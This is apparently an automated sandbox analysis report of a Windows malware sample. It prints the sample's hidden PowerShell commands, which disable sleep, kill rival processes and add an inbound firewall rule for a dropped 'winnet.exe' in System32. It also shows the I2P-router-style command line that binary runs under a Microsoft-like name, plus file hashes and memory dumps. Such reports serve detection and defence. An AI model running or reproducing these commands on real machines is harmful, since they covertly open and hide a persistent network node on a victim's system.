- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4592

C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" -change standby-timeout-ac 0
3⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-dc" "0"
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1700

C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" -change standby-timeout-dc 0
3⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "hibernate-timeout-ac" "0"
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4220

C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" -change hibernate-timeout-ac 0
3⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "hibernate-timeout-dc" "0"
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4612

C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" -change hibernate-timeout-dc 0
3⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1272

C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "winnet.exe"
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1872

C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "winnet.exe"
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1996

C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "wincfg.exe"
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4656

C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "wincfg.exe"
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:664

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "Remove-NetFirewallRule" "-DisplayName" "\"Windows Network Manager\""
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "New-NetFirewallRule" "-DisplayName" "\"Windows Network Manager\"" "-Program" "\"C:\Windows\system32\winnet.exe\"" "-Action" "Allow" "-Direction" "Inbound" "-EdgeTraversalPolicy" "Allow" "-Enabled" "True"
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1404

C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "WINNET.exe"
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1128

C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "WINNET.exe"
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2496

C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "WINCFG.exe"
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2544

C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "WINCFG.exe"
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3064

C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "WINNET.exe"
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:872

C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "WINCFG.exe"
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2904

C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "WINCFG.exe"
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4244

C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "WINNET.exe"
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1404

C:\WINDOWS\SYSTEM32\WINCFG.EXE
"C:\WINDOWS\SYSTEM32\WINCFG.EXE"
2⤵
- Executes dropped EXE
PID:3384

C:\WINDOWS\SYSTEM32\WINNET.EXE
"C:\WINDOWS\SYSTEM32\WINNET.EXE" "--datadir=C:\Windows\system32\data" "--precomputation.elgamal=false" "--persist.profiles=false" "--persist.addressbook=false" "--cpuext.aesni" "--cpuext.avx" "--ipv4" "--ipv6" "--bandwidth=X" "--share=100" "--floodfill" "--nat" "--upnp.enabled=true" "--upnp.name=Microsoft" "--insomnia" "--nettime.enabled=true" "--nettime.ntpsyncinterval=1" "--sam.enabled=true" "--sam.singlethread=false" "--http.enabled=false" "--bob.enabled=false" "--httpproxy.enabled=false" "--socksproxy.enabled=false" "--i2cp.enabled=false" "--i2pcontrol.enabled=false" "--loglevel=none" "--log=stdout"
2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1284

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u5amda14.ke5.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1-1aebd3c2333a05cb\f589fcc7eadd141cd236de03b7fd786668017655a0adeb057cd343f95117a6f1.exe
Filesize
42.5MB

MD5
18c3c899c9a4b44417d8153a948ae5ca

SHA1
8560c64c60ce15cb849b031d0690793e8b8793ec

SHA256
01e5fb6db31037b5e6f6ac1839d556c806b3fbdb31c2b4f5a7c19734e5420c70

SHA512
d058c166ca467978ce69b5a7ae16bd85c190ff9de562c020214c81e255e1ea0cecd132683d38302ac1cdb8f1399d89dd85d33fdf3b5a243812dd510fb1556cf4

Download Submit
C:\WINDOWS\SYSTEM32\WINCFG.EXE
Filesize
34.7MB

MD5
b969b295f08994b53015e7b0807ed43f

SHA1
e67a88f291df370105130dbe28e4798a8a8906ae

SHA256
513db022bfe45ca351ca8eb72b22389703b0d4932a64d144d00d616d89c24b83

SHA512
3fc4577ad19deeb5a39691ff58e4190dd3b1447a308cbddb8193301605e124ed7a59c91a63007fc9a04d46da2b7bb50d992a7a5ad50d2b9723252c9f687e7a7b

Download Submit
C:\Windows\System32\data\router.info
Filesize
931B

MD5
cd1d7b88fcb2bc6886d91e6ce82a6cad

SHA1
b9a3b559b37c7a0500fce28c5e0533444142a233

SHA256
40418b0fc6648620d3134fd50f06e807f22c984f7c2359a1c0cbae2f20ba54ac

SHA512
dbfea1ea954ccb9a76d4cc3f0eae7375ff6b539df02885f461519dedcfa4e4fca7cda76f94af83a0618656331c89f495d4406b64fdfbdaa5d187cad7f4c030b2

Download Submit
C:\Windows\System32\winnet.exe
Filesize
9.1MB

MD5
2fdbf4ba6ab24cf44aa0cc08cd77ca66

SHA1
df5e034ba45a932b9f5d3ed7adc4a71e0b376984

SHA256
fcd362e0632b35dad13a87f09ea6da4d07fa89516f42d64236d2cc3e3b2b725b

SHA512
81d73f7540ede7337922dc18fc6b110c87f621bc0349c3fa17f50d1cb924b0d9b30a4a772b2d548238b65a1be43d458f1991320e7308e608c6cf40ccc3e59a51

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
a1d772f7ba4efb15823f04adcd31b34c

SHA1
a02b1f7ff69998d5ccd1142c0a5aab0fbbbcab6f

SHA256
71eb1bceed4c5de6952e26225ddeafad918161eb1395c29d078a438ef7331e66

SHA512
a182170d909f136460bfc8716723e77c56ab2bbf11151158cbac5b8bea170086a2062a47c41e7c9572e9c06d80dc25631cf2d0561eb29d68bad20481862f850b

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
34b159616f80c1d5893cf406775bad4e

SHA1
dff5f71c17b07b8549b36e1c768db925205e1b4f

SHA256
120aeb6d51d942abd453d508b7bfd606aff0c798e588ca2e18b23d5a993820ad

SHA512
3694b353483d4297944cf8d0ecfba7ed832d94dc25dd7012c7d6b4415b5bfcc90d72b468f3cf3a038f3936d5b56ee14622677eb069a3a29933cb18ee447bb82b

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
8857491a4a65a9a1d560c4705786a312

SHA1
4f3caf2ad5d66a2410c9cca0381d26a46e832cb4

SHA256
b6e1a16a11075cb4e0bae0cebdb6ac15f5d66e0005f557703708a04cd11bd360

SHA512
d9497c47898cdc4c4fc62158830dc931990e08bb4a28a5d19d4187a87a2afab8a4bd58ca346563210b476c9adb9a714bfe1057e0ebce85d1fd94731be6d02660

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
a1127a05777a6f6c786c6a35dc63830c

SHA1
8ab0c43d07c1f85424b1930c5a8d8450a1308beb

SHA256
895bfb1a8cccd1f8453564f85f83ed786a23d7c3f10e444a8a91c4e680bd2e23

SHA512
0625a4e211c1508ebb60a031d0479348638191315cb31763c9a5d7cc63a380078d6bd1377a012a1d8f801897d46d73372675152da3051691140404be2c481819

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
a316ebd4efa11d6b6daf6af0cc1aebce

SHA1
ab338dd719969c70590dbc039b90e2758c741762

SHA256
f7308f111e3910da5c34c4d06d78d692f44419f848f5bf886fd466d5a96ad014

SHA512
67a9b94b704222a1bbe02fa8780c6b9bd364c8581b693ca28c6a444fde160df216304426bacf6b01909b80540cf0add79669b7a88ca260a6fbc93c4742f36c5a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
488afc33db78742dd97c079ece60eae6

SHA1
801b9b703d0d8fed0bbf9e19cc19df9c628c4bdc

SHA256
fb901357e59f971d138b099cdffe364a2ab4313ed9c6d38c0583f702260a4083

SHA512
8861b064328ce3c3e44c46d6a348ba48980ff25ec02bd790025f5dc2dd264cc09eeb79c0fdd0f28fa7ba3c05bfc8ee34bd3f7179cc32bdd547339e9e99371253

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
aa63de4cea54f45243c9b19cf4fff659

SHA1
ec140ae44c9d826964c14e75dd24c60ef54b42c3

SHA256
af5d29d5de91f6d39d2fe226eb4438e62d69bc9b15e56bde5c05bd96423e7ffe

SHA512
fac91b2f8aaf41f8fac0ebed92f0e0955808e0160cb2f874ba009a996969667ffe7d4b713946c1bd968cc9e2814baeab4a632c37aade0959d161ae99320b124f

Download Submit
memory/116-69-0x00007FF6C46C0000-0x00007FF6C46D0000-memory.dmp

Filesize
64KB

Download
memory/116-68-0x00007FF6C46B0000-0x00007FF6C46C0000-memory.dmp

Filesize
64KB

Download
memory/1056-92-0x000001F9F4210000-0x000001F9F422C000-memory.dmp

Filesize
112KB

Download
memory/1056-100-0x000001F9F4490000-0x000001F9F449A000-memory.dmp

Filesize
40KB

Download
memory/1056-99-0x000001F9F4480000-0x000001F9F4486000-memory.dmp

Filesize
24KB

Download
memory/1056-98-0x000001F9F4450000-0x000001F9F4458000-memory.dmp

Filesize
32KB

Download
memory/1056-97-0x000001F9F44A0000-0x000001F9F44BA000-memory.dmp

Filesize
104KB

Download
memory/1056-96-0x000001F9F4440000-0x000001F9F444A000-memory.dmp

Filesize
40KB

Download
memory/1056-95-0x000001F9F4460000-0x000001F9F447C000-memory.dmp

Filesize
112KB

Download
memory/1056-94-0x000001F9F42F0000-0x000001F9F42FA000-memory.dmp

Filesize
40KB

Download
memory/1056-93-0x000001F9F4230000-0x000001F9F42E5000-memory.dmp

Filesize
724KB

Download
memory/1284-278-0x00007FF6A05A0000-0x00007FF6A0ECC000-memory.dmp

Filesize
9.2MB

Download
memory/3148-214-0x00000132ED020000-0x00000132ED02E000-memory.dmp

Filesize
56KB

Download
memory/3148-215-0x00000132ED080000-0x00000132ED09A000-memory.dmp

Filesize
104KB

Download
memory/4140-22-0x0000016C7BD00000-0x0000016C7BD22000-memory.dmp

Filesize
136KB

Download